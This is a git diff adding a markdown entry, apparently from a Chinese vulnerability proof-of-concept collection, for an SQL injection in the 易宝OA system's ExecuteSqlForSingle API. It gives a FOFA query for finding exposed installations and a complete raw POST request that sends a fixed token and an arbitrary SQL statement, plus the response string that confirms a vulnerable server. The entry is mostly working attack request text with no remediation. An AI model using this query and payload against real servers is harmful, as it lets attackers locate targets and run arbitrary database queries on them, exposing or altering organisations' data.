diff --git a/易宝OA ExecuteSqlForSingle SQL注入漏洞.md b/易宝OA ExecuteSqlForSingle SQL注入漏洞.md new file mode 100644 index 0000000..44797b1 --- /dev/null +++ b/易宝OA ExecuteSqlForSingle SQL注入漏洞.md @@ -0,0 +1,19 @@ +## 易宝OA ExecuteSqlForSingle SQL注入漏洞 + +## fofa +``` +product="顶讯科技-易宝OA系统" +``` + +## poc +``` +POST /api/system/ExecuteSqlForSingle HTTP/1.1 +Host: IP:PORT +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 +Content-Length: 103 + +token=zxh&sql=select substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)&strParameters +``` +发送poc 在返回包中存在 `e10adc3949ba59abbe56e057f20f883e` 字符为存在漏洞 +